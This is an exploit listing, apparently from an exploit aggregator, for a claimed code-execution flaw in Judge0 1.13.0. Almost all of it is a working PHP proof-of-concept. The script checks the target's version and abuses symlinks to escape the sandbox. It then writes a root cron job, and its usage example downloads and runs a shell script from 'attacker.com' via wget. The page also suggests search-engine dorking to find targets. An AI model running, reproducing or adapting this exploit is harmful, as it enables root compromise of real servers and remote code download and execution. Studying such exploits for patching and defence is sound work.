Exploit for Judge0 1.13.0 Code Execution

Name: Exploit for Judge0 1.13.0 Code Execution
Rating: 5 (103 reviews)
2025-02-28 | CVSS 7.9
## https://sploitus.com/exploit?id=PACKETSTORM:189469
=============================================================================================================================================
    | # Title     : Judge0 v 1.13.0 PHP Code Injection Vulnerability                                                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://github.com/judge0/                                                                                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] The code is an exploit written in PHP to exploit a vulnerability in Judge0,
    
        which allows arbitrary commands to be executed on the target system by exploiting symlinks inside the sandbox environment.
     
    [+] save code as poc.php .
    
    [+] USage : cmd => c:\www\test\php poc.php 
    
    [+] SeT target  = Line : 111 + 114
    
    [+] PayLoad :
    
    <?php
    
    class Judge0Exploit
    {
        private $target;
        private $bash_id;
        private $languages = [];
    
        public function __construct($target)
        {
            $this->target = rtrim($target, '/');
        }
    
        private function send_request($endpoint, $method = 'GET', $data = null)
        {
            $url = "{$this->target}{$endpoint}";
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
    
            if ($data) {
                curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
                curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
            }
    
            $response = curl_exec($ch);
            curl_close($ch);
            return json_decode($response, true);
        }
    
        private function compile_language_ids()
        {
            $languages = $this->send_request('/languages');
    
            if (!$languages) {
                return false;
            }
    
            foreach ($languages as $language) {
                if (strpos($language['name'], 'Bash') !== false) {
                    $this->bash_id = $language['id'];
                }
    
                $lang_info = $this->send_request("/languages/{$language['id']}");
                if ($lang_info && isset($lang_info['compile_cmd']) && !$lang_info['is_archived']) {
                    $this->languages[] = $language;
                }
            }
    
            return !empty($this->languages);
        }
    
        public function check_vulnerability()
        {
            $res = $this->send_request('/version');
    
            if (!$res) {
                return "Unknown";
            }
    
            $version = $res;
            if (version_compare($version, '1.13.0', '<=')) {
                echo "Vulnerable version detected: $version\n";
                return $this->compile_language_ids() ? "Appears" : "Unknown";
            }
    
            return "Safe";
        }
    
        public function exploit($cmd)
        {
            if (!$this->compile_language_ids()) {
                die("Failed to get compile language ids\n");
            }
    
            $this->send_request('/submissions?wait=true', 'POST', [
                'source_code' => 'mv run runbak; ln -s /bin/rm run',
                'language_id' => $this->bash_id ?? 46
            ]);
    
            $cron_path = "/etc/cron.d/" . bin2hex(random_bytes(4));
            echo "Writing cron job to $cron_path\n";
    
            $language = !empty($this->languages) ? $this->languages[array_rand($this->languages)] : ['id' => 73, 'name' => 'Rust'];
            echo "Using language: {$language['id']}, {$language['name']}\n";
    
            $this->send_request('/submissions?wait=true', 'POST', [
                'source_code' => "#test " . bin2hex(random_bytes(5)),
                'language_id' => $language['id'],
                'compiler_options' => "--version\nln -s /bin/rm ./run\n#",
                'command_line_arguments' => "x\n" .
                    "cp /bin/rm {$cron_path}\n" .
                    "cp /usr/bin/unlink /bin/rm\n" .
                    "sed -i 's/.*/#/g' {$cron_path}\n" .
                    "sed -i \"2i {$this->cron_file($cmd)}\" {$cron_path}\n" .
                    "echo 'ok'\n"
            ]);
    
            echo "Exploit executed. Check cron jobs for execution.\n";
        }
    
        private function cron_file($command)
        {
            return "SHELL=/bin/sh\n" .
                "PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\n" .
                "* * * * * root $command\n";
        }
    }
    
    // Usage example
    $exploit = new Judge0Exploit("http://target-ip:2358");
    $vuln_status = $exploit->check_vulnerability();
    if ($vuln_status === "Appears") {
        $exploit->exploit("wget http://attacker.com/shell.sh -O /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh");
    } else {
        echo "Target is not vulnerable.\n";
    }
    
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================